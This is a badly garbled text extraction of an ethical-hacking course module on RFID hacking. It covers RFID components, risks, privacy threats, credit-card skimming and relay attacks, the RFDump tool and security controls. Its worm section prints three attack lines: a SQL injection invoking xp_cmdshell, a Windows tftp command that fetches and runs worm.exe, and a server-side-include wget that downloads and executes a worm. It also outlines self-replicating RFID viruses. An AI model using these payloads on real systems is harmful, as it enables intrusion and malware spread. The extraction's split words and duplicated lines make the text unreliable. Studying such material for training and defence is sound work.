CEHv6 Module 39 RFID Hacking pdf pdf
Ethical H ackin g an d
Coun term easures Coun term easures Version 6Mo d u le XXXIX RFID H ackin g News Source: http:/ / w w w .theregister.co.uk/
Module Objective
This m odule will fam iliarize you with: y
- RFID
- Com pon en ts of RFID system s Com pon en ts of RFID system s
- RFID System Architecture • RFID Collision s
- RFID Risks RFID Risks • RFID an d Privacy Issues • RFID Security an d Privacy Threats • Vuln erabilities in RFID-en abled Credit Cards Vuln erabilities in RFID en abled Credit Cards • RFID H ackin g Tool • RFID Security Con trols
Module Flow
RFID RFID an d Privacy Issues
Com pon en ts of RFID system s
RFID Security an d Privacy Threats RFID system s
RFID System Architecture Privacy Threats
Vuln erabilities in RFID System Architecture
RFID-en abled Credit Cards RFID Collision s
RFID H ackin g Tool RFID Risks
RFID Security Con trols RFID Radio Frequen cy Iden tification (RFID) is an autom atic iden tification m ethod m ethod It tran sm its iden tity of an object in the form of a un ique serial n um ber usin g radio waves g RFID system s work on the prin ciple of con tactless tran sfer of data between data carryin g device an d its reader
RFID
RFID tags con tain at least two parts:
• In tegrated circuit to store an d process in form ation , m odulate, an d
dem odulate an (RF) sign al- An An ten n a for receivin g an d tran sm ittin g sign al An An ten n a for receivin g an d tran sm ittin g sign al
Com pon en ts of RFID System s
Basic com pon en ts of a RFID system s: system s:
- Tags • Tag readers
- RFID an ten n a RFID an ten n a
- RFID con troller
- RFID prem ises server
- RFID in tegration server
Gen eral categories of RFID tags:
- Pa s s ive : Requires n o in tern al power source P i R q i i t l
- Active : Requires in tern al power source
(Sm all battery)
- S e m i-p a s s ive ( Ba tte ry-a s s is te d ) :
Requires in tern al power source(Sm all Requires in tern al power source(Sm all battery)
RFID Collision s RFID Tag Collision : g
- RFID Tag collision happen s when m ultiple tags are en ergized by RFID tag reader sim ultan eously, an d reflect their respective sign als back to reader at the reflect their respective sign als back to reader at the sam e tim e
RFID Reader Collision : RFID Reader Collision :
- Reader collision occurs in RFID system s when coverage area of on e RFID reader overlaps with coverage area of on e RFID reader overlaps with that of an other reader
- This causes two differen t proble>Sign al in terferen ce
- Multiple reads of sam e tag M l i l d f
RFID Risks Busin ess Process Risk Busin ess In telligen ce Risk Busin ess In telligen ce Risk Privacy Risk Extern ality Risk
- H azards of Electrom agn etic Radiation H azards of Electrom agn etic Radiation • Com puter Network Attacks
RFID Risks: Busin ess Process Risk Risk
Direct attacks on RFID system com pon en ts poten tially could un derm in e busin ess processes, which the RFID system was design ed to en able processes which the RFID system was design ed to en able RFID system s typically are im plem en ted to replace or en han ce a paper or partially autom ated process Organ ization s im plem en tin g RFID system s could becom e relian t on those system s Failure in an y com pon en t or subsystem of RFID system could result in system wide failure Un like m ost of other risks, busin ess process risk can occur as a result of both hum an action an d n atural causes If n etwork supportin g RFID system is down , then RFID system is likely to be down as well
RFID Risks: Busin ess In telligen ce Risk In telligen ce Risk RFID supports wireless rem ote access to get in form ation about assets an d pp g people that either previously did n ot exist or was difficult to create or dyn am ically m ain tain A com petitor or adversary can gain in form ation from RFID system in a n um ber of ways:
- Eavesdroppin g on RF lin ks between readers an d tags
- Perform in g in depen den t queries on tags to obtain relevan t data
- Obtain in g un authorized access to a back-en d database which stores in form ation g about tagged item s
Usin g con trols such as database access con trols, password-protection , an d
cryptography can sign ifican tly m itigate busin ess in telligen ce risk if applied cryptography can sign ifican tly m itigate busin ess in telligen ce risk if applied
properlyRFID Risks: Privacy Risk
Busin ess objectives often con flict with privacy objectives j p y j Organ ization s can ben efit from an alysis an d sharin g of person al in form ation obtain ed with RFID techn ology b gy Privacy risk from the perspective of organ ization Privacy risk from the perspective of organ ization im plem en tin g RFID, m ight in clude:
- Pen alties if organ ization does n ot com ply with privacy laws an d regulation s • Pen alties if organ ization does n ot com ply with privacy laws an d regulation s
- Custom er avoidan ce or boycott of organ ization because of real or perceived privacy con cern s about RFID techn ology
- Bein g held legally liable for an y con sequen ces of weak privacy protection s
- Em ployees, shareholders, an d other stakeholders m ight disassociate with Em ployees, shareholders, an d other stakeholders m ight disassociate with organ ization due to con cern s about corporate social respon sibility
privacy risk in clude: gg p
RFID Risks: Privacy Risk (con t’d) Other factors that im pact the level of privacy risk in clude:
- Whether person al in form ation is stored on tags
- Whether tagged item s are con sidered person al >
- Len gth of tim e records are retain ed in an alytic or archival system s system s
- Effectiven ess of RFID security con trols, in particu>Efficien cy of tag m em ory access con trol an d authen tication m echan ism s ec a s s
• Ability of tags to be disabled after their use in a busin ess
process- Ability of users to effectively shield tags to preven t th i d d t ti un authorized read tran saction s
• The likelihood that the tag will be in proxim ity of com patible
readersRFID Risks: Extern ality Risk RFID system s typically are n ot isolated from other system s an d assets in RFID system s typically are n ot isolated from other system s an d assets in en terprise Extern ality risks can exploit both RF an d en terprise subsystem s of an RFID system :
- Major extern ality risk for RF subsystem is hazards resultin g from electrom agn etic radiation
- Major extern ality risk for en terprise subsystem is com puter n etwork attacks on n etworked devices an d application s t k d d i d li ti
As extern ality risk by defin ition in volves risks outside of RFID system ; it is distin ct for both busin ess process an d busin ess in telligen ce risks distin ct for both busin ess process an d busin ess in telligen ce risks
RFID an d Privacy Issues An y organ ization con tem platin g the use of RFID should first y g p g en sure that it is aware of its privacy obligation s un der differen t laws before it starts accum ulatin g data
RFID attacks used to bypass person al privacy in form ation are:
- By placin g RFID tags hidden from eyes, an d usin g it for stealth trackin g
- Usin g un ique iden tifiers provided by RFID for profilin g and U i iq id tifi id d b RFID f fili d iden tifyin g con sum er pattern an d behavior
- Usin g hidden readers for stealth trackin g an d gettin g person al in form ation
Coun term easures Methods that are used to avoid RFID attacks: RSA Blocker Tags: g
- It helps in m ain tain in g the privacy of con sum er by spam m in g from an y reader who attem pts to scan tags without the authorization
Kill Switches: Kill S i h
- Newer RFID tags are bein g shipped with a Kill Switch, which allows RFID tags to be disabled
RFID Security an d Privacy Threats
Sn iffin g Trackin g Spoofin g Spoofin g Replay attacks Den ial-of-service
Sn iffin g
RFID tags are design ed to be readable by an y com plian t reader RFID t d i d t b d bl b li t d It is easy to collect RFID data by eavesdroppin g on wireless RFID chan n el Un restricted access to tag data can have serious im plication s Collected tag data m ight reveal in form ation such as m edical
predisposition s or un usual person al in clin ation s, causin g den ial of predisposition s or un usual person al in clin ation s causin g den ial of
in suran ce coverage or em ploym en t for an in dividualTrackin g
RFID techn ology facilitates secret m on itorin g of in dividual s location RFID techn ology facilitates secret m on itorin g of in dividual’s location an d action s
RFID readers placed in strategic location s can record RFID tag’s un ique
respon ses, this can then be persisten tly associated with a person ’s iden tity RFID tags without un ique iden tifiers facilitates trackin g by form in gcon stellation m ean s recurrin g groups of tags that are associated with an con stellation m ean s recurrin g groups of tags that are associated with an
in dividualSpoofin g
Attackers can m im ic authen tic RFID tags by Attackers can m im ic authen tic RFID tags by writin g appropriately form atted data on blan k RFID tags Tag clon in g is an other kin d of spoofin g attack which produces un authorized copies attack, which produces un authorized copies of legitim ate RFID tags
Researchers from J ohn s H opkin s Un iversity recen tly clon ed a cryptographically- protected Texas In strum en ts digital i d sign ature tran spon der
Replay Attacks
RFID relay devices can in tercept an d retran sm it RFID queries, which e ay de ces ca te cept a d et a s t que es, c offen ders can use to abuse various RFID application s En glan d’s n ew RFID-en abled licen se plates, e-Plates is an exam ple of m odern RFID system that is susceptible to attack by a relay device Active e-Plate tags con tain an en crypted ID code that is stored in UK Min istry of Tran sport’s vehicle database An attacker can record en crypted iden tifier when an other car’s licen se plate is scan n ed an d replay it later li l i d d l i l
Den ial-of-service
Thieves can exploit RFID tags an d back-en d databases to steal RFID- hi l i d b k d d b l tagged item s by rem ovin g tags from the item s com pletely or by puttin g them in a foil lin ed booster bag that blocks RFID readers q query sign als an d tem porarily deactivates the item s y g p y An other attack takes the opposite approach; floods an RFID system pp pp ; y with m ore data than it can han dle Attacker can rem ove RFID tags an d plan t them on other item s, causin g RFID system s to record useless data, discreditin g, an d devaluin g RFID techn ology g gy
Protection again st RFID Attacks Cryptography:
- Min im alist cryptography
- H um an -com puter authen tication
- H ash locks
Detection an d evasion :
- RFID Detektor (http:/ / tin yurl.com / )
- Data Privatizer (https:/ / shop.foebud.org/ ) • Data Privatizer (https:/ / shop foebud org/ )
- RFID Guardian (www.rfidguardian .org)
Tem porary Deactivation :
- Con sum ers can deactivate their RFID tags to avoid m ost m odern -day threats
Other techn iques:
- Periodically m odification of RFID tag iden tifiers’ appearan ce an d data
RFID Guardian
RFID Guardian is a m obile battery-powered device that offers person al RFID security an d privacy m an agem en t for people RFID Guardian m on itors an d regulates RFID usage on behalf of custom ers It is m ean t for person al use an d m an ages the RFID tags within physical proxim ity of a person It It acts like an RFID reader, queryin g tags, an d decodin g the tag respon ses, an d it can also t lik RFID d q i t d d di th t d it l em ulate an RFID tag, allowin g it to perform direct in -ban d com m un ication s with other RFID readers RFID Guardian is the in tegration of four separate security RFID Guardian is the in tegration of four separate security properties in to a sin gle device:
- Auditin g
- Key m an agem en t
- Access con trol
- Authen tication
RFID Malware RFID m alware is tran sm itted an d executed via RFID tag:
- Threats arise when crim in als cause valid RFID tags to behave in an un expected ways
- If certain vuln erabilities exist in RFID software, an RFID tag can be in fected with a virus
- When an un suspectin g reader scan s an in fected tag, there is a dan ger of tag exploitin g a vuln erability
Classes of RFID Malware:
Classes of RFID Malware:
- RFID Exploit:
- It is a m alicious RFID tag data that exploits som e vuln erabilities of RFID system >RFID Worm :
- It is an RFID-based exploit that abuses a n etwork con n ection to achieve self-replica
- RFID Virus:
- It is an RFID-based exploit that auton om ously self-replicates its code to n ew RFID tags, without requirin g a n etwork con n ection
It i RFID b d l it th t t l lf li t it d t
H ow to Write an RFID Virus Viruses perform s two types of fun ction s, it replicates itself usin g database an d option ally it executes pay load p y p y Broadly there are two types of virus replication :
Replication Usin g Self-Referen tial Queries
- Database system s usually offer a way to obtain curren t run n in g queries for system adm in istration purposes
- In two version s of virus, on e con tain s sin gle query an d other con tain s m ultiple queries In two version s of virus, on e con tain s sin gle query an d other con tain s m ultiple queries
- Sin gle query virus requires less features from database, but can n ot carry SQL code as a payload
- Whereas m ultiple queries require a database that supports SQL load as a payload
R Replication Usin g Quin es li i U i Q i
- Quin e is a program that prin ts its own source code
- It copies its own source code in to database then it is latter copied on to tags
- Quin e requires m ultiple queries, which m ean s they are n ot supported on all databases
- They allow SQL code to be executed as a payload
H ow to Write an RFID Worm
Worm is a program that self-propagates across a n etwork, exploitin g o s a p og a t at se p opagates ac oss a et o , e p o t g
security flaws in widely-used services A RFID An RFID worm propagates by exploitin g security flaws in on lin e b l i i i fl i li RFID services RFID worm s do n ot require users to do an y thin g to propagate, although they spread via RFID tags, if given the opportun ity- RFID tags are too sm all to carry en tire worm
Propagation : • Tag con tain s on ly en ough of worm to down load the
rest from the com puter con n ected to In tern et rest from the com puter con n ected to In tern etH ow to Write an RFID Worm (con t d) (con t’d)
RFID tag can either in clude bin ary code to down load an d execute worm or shell
com m an ds Exam ple 1 - Executin g shell com m an ds usin g SQL Server Apples'; EXEC Master..xp_cmdshell 'shell commands'; Exam ple 2 - Down loadin g an d executin g a worm on Win dows cd \Windows\Temp & tftp -i <ip> GET worm.exe & worm.exe Exam ple 3 - Down loadin g an d executin g a worm on Lin ux usin g SSI <!--#exec cmd="wget http://ip/worm -O /tmp/worm; chmod +x /tmp/worm; /tmp/worm /tmp/worm; /tmp/worm "--> >Defen din g Again st RFID Malware Malware Lock down RFID user accoun ts an d database accoun ts Disable or rem ove an y features that are n ot required To avoid SQL in jection :
- An y data that is copied in to a SQL statem en t should be checked an d escaped usin g the An y data that is copied in to a SQL statem en t should be checked an d escaped usin g the fun ction s provided by database API
- For better security, do n ot copy data in to SQL statem en ts, but use prepared statem en ts an d param eter bin din g
Clien t-side scriptin g can be preven ted by properly escapin g data in serted in to Clien t-side scriptin g can be preven ted by properly escapin g data in serted in to H TML pages Buffer overflows can be preven ted by properly checkin g buffer boun ds Buffer overflows can be preven ted by properly checkin g buffer boun ds
RFID Exploits SQL In jection : Q j
- If RFID m iddleware does n ot process the data read from the tag correctly, it is possible to exploit this vuln erability of database by executin g SQL code that is stored on the tag of database by executin g SQL code that is stored on the tag
Clien t-side Scriptin g:
- Exploitin g dyn am ic features offered by m odern browsers,
The World's First by in cludin g J avaScript code on the tag RFID Chip In fected with a Virus i h Vi
Buffer Overflow:
- Exploitin g lim ited m em ory of RFID tag by readin g m ore E l iti li it d f RFID t b di data than expected, causin g its buffer to overflow
Vuln erabilities in RFID-en abled Credit Cards Credit Cards Trackin g Attack Trackin g Attack
- In this attack, a legitim ate m erchan t exceeds the expected use of his/ her RFID credit card readers of his/ her RFID credit card readers
Eavesdroppin g Attack
- In an eavesdroppin g attack, an adversary uses an an ten n a to record com m un ication between a legitim ate RF device an d reader d
- As eavesdroppin g happen s on live com m un ication ; foil shieldin g does n ot help to preven t this particular attack
- Eavesdroppin g feasibility depen ds on m an y factors in cludin g read distan ce d di
Vuln erabilities in RFID-en abled Credit Cards (con t d) Credit Cards (con t’d)
Skim m in g Attack Ski i A k
- In this attack, an un authorized an d poten tially clan destin e reader reads tags from either close proxim ity or from a distan ce g p y
- J ohn n y Carson attack on RFID credit cards occurs when an attacker has access to physical m ail stream to read RF data from credit cards in tran sit to their own ers
- This attack is particularly powerful because the adversary gain s p y p
y g accessory kn owledge such as cardholder address
- A com prom ised reader at a parkin g garage could skim custom er’s credit-card in form ation at sam e tim e that they read the parkin g pass
- Fob-type RFID credit cards are n ow available for attachm en t to key rin gs, exposin g them to attack when con sum ers leave their keys h k h l h k un atten ded
- This behavior is seen m ost often in valet-parkin g situation s, or in gym n asium s where it is com m on for users to leave their keys together in an un secured box by the door in an un secured box by the door
Vuln erabilities in RFID-en abled Credit Cards (con t’d) Credit Cards (con t d) Replay an d relay Attack
- In a replay attack, an attacker broadcasts an exact replay of the tran spon der en d of the radio sign al recorded from a past tran saction between an Rfdevice an d a reader
- This attack, com m on ly kn own as the relay attack, uses a m an in the m iddle • This attack com m on ly kn own as the relay attack uses a m an in the m iddle attack to relay an tran sien t con n ection from a legitim ate reader through on e or m ore adversarial devices to a legitim ate tag which m ay be at a con siderable distan ce
- The distan ce at which the relay attack can succeed is lim ited on ly by the laten cy which will be tolerated by the attacked protocol hi h ill b l d b h k d l
Cross con tam in ation Attack
- The cross con tam in ation attack occurs when private in form ation such as cardholder n am e, n um ber, an d expiration date learn ed by an attacker in an RF con text are then used by the attacker in a differen t con text
- The attacker can use this data to create a m agstripe card, re-en code the stripe on an existin g card, or use these data in a card-n ot-presen t tran saction such as on an existin g card or use these data in a ‘card-n ot-presen t’ tran saction such as a telephon e or on lin e m ail-order purchase
RFID H ackin g Tool RFID H ki T l
RFDum p
RFDum p is a tool that allows you to read RFID tags within range, an d to chan ge p y g g , g an d alter all the data stored in the RFID tag RFDum p is a backen d GPL tool to directly in teroperate with an y RFID ISO- Reader to m ake the con ten ts stored on RFID tags accessible The user data can be displayed an d m odified usin g an H ex an d either an ASCII editor RFDum p works with the ACG m ulti-tag reader or sim ilar card reader hardware
RFDum p: Screen shot 1
RFDum p: Screen shot 2 RFID Security Con trols
Man agem en t Con trols A m an agem en t con trol in volves oversight of the security of the RFID system A m an agem en t con trol in volves oversight of the security of the RFID system The m an agem en t of an organ ization m ight n eed to update existin g policies to address RFID im plem en tation s
Man agem en t con trols are typically in volved in risk assessm en t, system plan n in g,
an d system acquisition , as well as security certification s, accreditation s, and an d system acquisition as well as security certification s accreditation s an d assessm en tsThe m an agem en t con trols for RFID system s: The m an agem en t con trols for RFID system s:
- RFID Usage Policy • IT Security Policies • Agreem en ts with Extern al Organ ization s A t ith E t l O i ti
- Min im izin g Sen sitive Data Stored on Tags
Operation al Con trols An operation al con trol in volves the action s perform ed on a daily basis by the system ’s adm inistrators and users t ’ d i i t t d
There are several types of operation al con trols:
- Physical access con trols restrict access to authorized person n el where Physical access con trols restrict access to authorized person n el where the RFID system s are deployed
- Proper placem en t of RF equipm en t helps to avoid in terferen ce an d reduce hazards from electrom agn etic radiation
- Organ ization s can destroy tags after they are n o lon ger useful to preven t adversaries from gain in g access to their data d i f i i h i d
- Operator train in g en sures that person n el usin g the system follow appropriate guidelin es an d policies
- In form ation labels an d n otice can in form users of the in ten ded purposes of the RFID system an d sim ple m ethods users can em ploy to purposes of the RFID system an d sim ple m ethods users can em ploy to m itigate risk
Techn ical Con trols
A techn ical con trol uses techn ology to m on itor or restrict the action s that can be
perform ed within the system perform ed within the system Techn ical con trols are listed specifyin g the stan dards while others are available on ly in proprietary system s Man y techn ical con trols related to a tag require the tag to perform addition al com putation s an d to have addition al volatile m em ory Techn ical con trols exist for all com pon en ts of RFID system s, in cludin g the RF, Techn ical con trols exist for all com pon en ts of RFID system s in cludin g the RF en terprise, an d in ter-en terprise subsystem sThe gen eral types of RF subsystem con trols in clude con trols to: con trols to:
- Provide authen tication an d in tegrity services to RFID com pon en ts an d tran saction s
- Protect RF com m un ication between reader an d tag Protect RF com m un ication between reader an d tag
- Protect the data stored on tags
RFID Security
The tags can be set to have a security bit turn ed on in reserved m em ory block on the tag Ran dom tran saction IDs should be presen t on rewritable tags Im proved passwords via persisten t state Mutual authen tication of tag an d reader with privacy for the tag M l h i i f d d i h i f h
- PRF Private Authen tication Schem e
- TreeBased Private Authen tication
- A TwoPhase Tree Schem e A T Ph T S h Security to protect the read-write option s
- Password protected • Password protected
Sum m ary
Radio Frequen cy Iden tification (RFID) is an autom atic iden tification m ethod RFID tag is an electron ic device that holds data An RFID reader is a device that is used to in terrogate an RFID tag RFID station s can read an d update in form ation stored in to the RFID tag RFID stan dards defin e Air In terface Protocol, Data Con ten t, Con form an ce, an d Application s The protective m easures again st RFID attacks are Cryptography, Detection an d evasion , The protective m easures again st RFID attacks are Cryptography, Detection an d evasion , Tem porary Deactivation , an d Other techn iques